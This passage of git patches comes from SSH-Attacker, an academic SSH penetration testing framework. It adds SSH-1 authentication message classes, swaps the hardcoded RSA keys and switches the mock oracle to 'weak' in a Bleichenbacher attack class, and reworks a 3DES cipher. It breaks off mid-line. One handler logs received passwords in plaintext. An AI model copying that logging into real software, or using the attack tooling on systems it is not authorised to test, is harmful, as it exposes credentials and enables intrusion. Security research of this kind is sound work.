b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/UserMessageSerializier.java new file mode 100644 index 000000000..1d24c2490 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/UserMessageSerializier.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.UserMessageSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class UserMessageSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public UserMessageSerializier(UserMessageSSH1 message) { + super(message); + } + + private void serializeUsername() { + LOGGER.debug("Description length: " + message.getUsername().getValue().length()); + appendInt( + message.getUsername().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getUsername().getValue()); + appendString(message.getUsername().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeUsername(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 8fbbc1869..21b5add65 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -173,6 +173,8 @@ public abstract class MessageAction extends ConnectionBoundAction { name = "ClientSessionKeyMessageSSH1"), @XmlElement(type = SuccessMessageSSH1.class, name = "SuccessMessageSSH1"), @XmlElement(type = FailureMessageSSH1.class, name = "FailureMessageSSH1"), + @XmlElement(type = UserMessageSSH1.class, name = "UserMessageSSH1"), + @XmlElement(type = AuthPasswordSSH1.class, name = "AuthPasswordSSH1"), @XmlElement(type = DisconnectMessageSSH1.class, name = "DisconnectMessageSSH1") }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 17006416f..047318337 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -163,6 +163,8 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { name = "ClientSessionKeyMessageSSH1"), @XmlElement(type = SuccessMessageSSH1.class, name = "SuccessMessageSSH1"), @XmlElement(type = FailureMessageSSH1.class, name = "FailureMessageSSH1"), + @XmlElement(type = UserMessageSSH1.class, name = "UserMessageSSH1"), + @XmlElement(type = AuthPasswordSSH1.class, name = "AuthPasswordSSH1"), @XmlElement(type = DisconnectMessageSSH1.class, name = "DisconnectMessageSSH1") }) protected List> expectedMessages = new ArrayList<>(); From b7d28f6a5c323008e360b802670c6e22e5949409 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 01:02:28 +0100 Subject: [PATCH 121/176] Generating MOCKs --- .../attacks/impl/BleichenbacherAttacker.java | 11 ++++++----- .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 4 ++-- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index f3e2bad2f..131771d85 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -226,7 +226,7 @@ public void executeAttack() { "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", 16));*/ - /*// Host 2048 + // Host 2048 CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( new BigInteger( @@ -303,9 +303,9 @@ public void executeAttack() { + "C5E4CB3A9E2ECEE52BB07C33F92893" + "A5D5B6F163BE6FBC1E8E66E4666866" + "871890105EFFE1193F", - 16));*/ + 16)); - // Host 1024 + /*// Host 1024 CustomRsaPublicKey hostPublicKey = new CustomRsaPublicKey( new BigInteger("010001", 16), @@ -376,7 +376,8 @@ public void executeAttack() { + "27DB0768AB643AD09A7C42C6AD47DA" + "ACE6CD53C051E26E69AF472D0CFE17" + "322EC96499E529", - 16)); + 16));*/ + /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; @@ -488,7 +489,7 @@ public void executeAttack() { + " \"Outer-Tries\": \"%d\"," + " \"serverkey_lenght\": \"%d\"," + " \"hostkey_lenght\": \"%d\"," - + " \"oracle_type\": \"real\"" + + " \"oracle_type\": \"weaks\"" + "}", ArrayConverter.bytesToHexString(solutionByteArray), ArrayConverter.bytesToHexString(encryptedSecret), diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index f98ca26f6..43447e261 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -211,8 +211,8 @@ private boolean[] oracleWeak(byte[] msg) { */ @Override public boolean[] checkDoublePKCSConformity(byte[] msg) { - // return oracleWeak(msg); - return oracleStrong(msg); + return oracleWeak(msg); + // return oracleStrong(msg); } private byte[] fillUpArray(int lenght, byte[] inputArray) { From dcef23394c7449d48b2c0ae2bec2f21034a425e9 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 23:38:40 +0100 Subject: [PATCH 122/176] Implementing AuthPassword und AuthRhosts --- .../ssh1/handler/AuthPasswordHandler.java | 28 ++++++++ .../ssh1/handler/AuthRhostsHandler.java | 28 ++++++++ .../ssh1/message/AuthPasswordSSH1.java | 63 ++++++++++++++++++ .../protocol/ssh1/message/AuthRhostsSSH1.java | 64 +++++++++++++++++++ .../ssh1/parser/AuthPasswordParser.java | 39 +++++++++++ .../ssh1/parser/AuthRhostsParser.java | 47 ++++++++++++++ .../preparator/AuthPasswordPreparator.java | 29 +++++++++ .../ssh1/preparator/AuthRhostsPreparator.java | 34 ++++++++++ .../serializer/AuthPasswordSerializier.java | 37 +++++++++++ .../serializer/AuthRhostsSerializier.java | 38 +++++++++++ 10 files changed, 407 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthPasswordHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthPasswordSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthPasswordParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthPasswordPreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsPreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthPasswordSerializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsSerializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthPasswordHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthPasswordHandler.java new file mode 100644 index 000000000..b182f5e79 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthPasswordHandler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthPasswordSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthPasswordHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthPasswordHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AuthPasswordSSH1 message) { + LOGGER.warn("Recieved a Password: {}", message.getPassword().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsHandler.java new file mode 100644 index 000000000..60df2757c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsHandler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AuthRhostsSSH1 message) { + LOGGER.warn("Recieved a Rhosts{}", message.getClientside_username().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthPasswordSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthPasswordSSH1.java new file mode 100644 index 000000000..5ab145dcf --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthPasswordSSH1.java @@ -0,0 +1,63 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AuthPasswordHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AuthPasswordParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AuthPasswordPreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AuthPasswordSerializier; +import java.io.InputStream; + +public class AuthPasswordSSH1 extends SshMessage { + + private ModifiableString password; + + public ModifiableString getPassword() { + return password; + } + + public void setPassword(ModifiableString password) { + this.password = password; + } + + public void setPassword(String password) { + this.password = ModifiableVariableFactory.safelySetValue(this.password, password); + } + + @Override + public AuthPasswordHandler getHandler(SshContext context) { + return new AuthPasswordHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new AuthPasswordParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AuthPasswordPreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AuthPasswordSerializier(this); + } + + @Override + public String toShortString() { + return "AUTH_PASSWORD"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsSSH1.java new file mode 100644 index 000000000..5e73bee18 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsSSH1.java @@ -0,0 +1,64 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AuthRhostsHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AuthRhostsParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AuthRhostsPreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AuthRhostsSerializier; +import java.io.InputStream; + +public class AuthRhostsSSH1 extends SshMessage { + + private ModifiableString clientside_username; + + public ModifiableString getClientside_username() { + return clientside_username; + } + + public void setClientside_username(ModifiableString clientside_username) { + this.clientside_username = clientside_username; + } + + public void setClientside_username(String clientUsername) { + this.clientside_username = + ModifiableVariableFactory.safelySetValue(this.clientside_username, clientUsername); + } + + @Override + public AuthRhostsHandler getHandler(SshContext context) { + return new AuthRhostsHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new AuthRhostsParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AuthRhostsPreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AuthRhostsSerializier(this); + } + + @Override + public String toShortString() { + return "AUTH_RHOSTS"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthPasswordParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthPasswordParser.java new file mode 100644 index 000000000..5ccb8d09f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthPasswordParser.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthPasswordSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthPasswordParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthPasswordParser(SshContext context, InputStream stream) { + super(stream); + } + + private void parsePassword(AuthPasswordSSH1 message) { + int lenght = parseIntField(4); + String password = parseByteString(lenght); + message.setPassword(password); + } + + @Override + protected void parseMessageSpecificContents(AuthPasswordSSH1 message) { + parsePassword(message); + } + + @Override + public void parse(AuthPasswordSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsParser.java new file mode 100644 index 000000000..6dea1a135 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsParser.java @@ -0,0 +1,47 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsParser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseCRC(AuthRhostsSSH1 message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); + } + + private void parseClientSideUsername(AuthRhostsSSH1 message) { + int lenght = parseIntField(4); + String clientSideUsername = parseByteString(lenght); + message.setClientside_username(clientSideUsername); + } + + private void parseProtocolFlags(AuthRhostsSSH1 message) {} + + @Override + protected void parseMessageSpecificContents(AuthRhostsSSH1 message) { + parseClientSideUsername(message); + } + + @Override + public void parse(AuthRhostsSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthPasswordPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthPasswordPreparator.java new file mode 100644 index 000000000..ab3f6da82 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthPasswordPreparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthPasswordSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthPasswordPreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthPasswordPreparator(Chooser chooser, AuthPasswordSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AUTH_PASSWORD); + } + + @Override + public void prepareMessageSpecificContents() { + getObject().setPassword(chooser.getConfig().getPassword()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsPreparator.java new file mode 100644 index 000000000..962a9d5cd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsPreparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsPreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsPreparator(Chooser chooser, AuthRhostsSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AUTH_RHOSTS); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + + if (getObject().getClientside_username() == null) { + getObject().setClientside_username("DummyValue"); + } + LOGGER.debug(getObject().getClientside_username().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthPasswordSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthPasswordSerializier.java new file mode 100644 index 000000000..4b57e5958 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthPasswordSerializier.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthPasswordSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthPasswordSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthPasswordSerializier(AuthPasswordSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getPassword().getValue()); + appendInt( + message.getPassword().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getPassword().getValue()); + appendString(message.getPassword().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsSerializier.java new file mode 100644 index 000000000..4c09f6a09 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsSerializier.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsSerializier(AuthRhostsSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getClientside_username().getValue()); + appendInt( + message.getClientside_username().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getClientside_username().getValue()); + appendString(message.getClientside_username().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} From 546fb36e89b16cfe9f402be260599501f334105b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 23:38:53 +0100 Subject: [PATCH 123/176] Fixing TribleDES --- .../core/crypto/cipher/TribleDESCipher.java | 92 ++++++++++--------- 1 file changed, 49 insertions(+), 43 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java index 697ef9285..95a52cea3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java @@ -23,12 +23,20 @@ class TribleDESCipher extends AbstractCipher { private static final Logger LOGGER = LogManager.getLogger(); private final byte[] key1, key2, key3; - private final Cipher cipher1, cipher2, cipher3; + private final Cipher encCipher1, encCipher2, encCipher3; + private final Cipher decCipher1, decCipher2, decCipher3; public TribleDESCipher(byte[] key) { LOGGER.debug("Init with key {}", ArrayConverter.bytesToHexString(key)); + IvParameterSpec encIvSpec1 = new IvParameterSpec(new byte[8]); + IvParameterSpec encIvSpec2 = new IvParameterSpec(new byte[8]); + IvParameterSpec encIvSpec3 = new IvParameterSpec(new byte[8]); + IvParameterSpec decIvSpec1 = new IvParameterSpec(new byte[8]); + IvParameterSpec decIvSpec2 = new IvParameterSpec(new byte[8]); + IvParameterSpec decIvSpec3 = new IvParameterSpec(new byte[8]); + this.key1 = new byte[8]; this.key2 = new byte[8]; this.key3 = new byte[8]; @@ -38,10 +46,26 @@ public TribleDESCipher(byte[] key) { System.arraycopy(key, 16, this.key3, 0, 8); try { - this.cipher1 = Cipher.getInstance("DES/CBC/NoPadding"); - this.cipher2 = Cipher.getInstance("DES/CBC/NoPadding"); - this.cipher3 = Cipher.getInstance("DES/CBC/NoPadding"); - } catch (NoSuchAlgorithmException | NoSuchPaddingException e) { + this.encCipher1 = Cipher.getInstance("DES/CBC/NoPadding"); + this.encCipher2 = Cipher.getInstance("DES/CBC/NoPadding"); + this.encCipher3 = Cipher.getInstance("DES/CBC/NoPadding"); + + encCipher1.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key1, "DES"), encIvSpec1); + encCipher2.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key2, "DES"), encIvSpec2); + encCipher3.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key3, "DES"), encIvSpec3); + + this.decCipher1 = Cipher.getInstance("DES/CBC/NoPadding"); + this.decCipher2 = Cipher.getInstance("DES/CBC/NoPadding"); + this.decCipher3 = Cipher.getInstance("DES/CBC/NoPadding"); + + decCipher1.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key3, "DES"), decIvSpec1); + decCipher2.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key2, "DES"), decIvSpec2); + decCipher3.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key1, "DES"), decIvSpec3); + + } catch (NoSuchAlgorithmException + | NoSuchPaddingException + | InvalidAlgorithmParameterException + | InvalidKeyException e) { throw new RuntimeException(e); } } @@ -53,32 +77,21 @@ public byte[] encrypt(byte[] plainData) throws CryptoException { @Override public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { + // iv = new byte[8]; LOGGER.info( "Encrypting 3DES with data: {} with iv {}", ArrayConverter.bytesToHexString(plainData), - iv); - IvParameterSpec decryptIv = new IvParameterSpec(iv); - try { - LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key1)); - LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key2)); - LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key3)); - - cipher1.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key1, "DES"), decryptIv); - cipher2.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key2, "DES"), decryptIv); - cipher3.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key3, "DES"), decryptIv); + ArrayConverter.bytesToHexString(iv)); - byte[] enc1 = cipher1.doFinal(plainData); - byte[] enc2 = cipher2.doFinal(enc1); - byte[] enc3 = cipher3.doFinal(enc2); - LOGGER.info("Resulting in encrypted ata: {}", ArrayConverter.bytesToHexString(enc3)); - return enc3; + LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key1)); + LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key2)); + LOGGER.debug("Encryption with key {}", 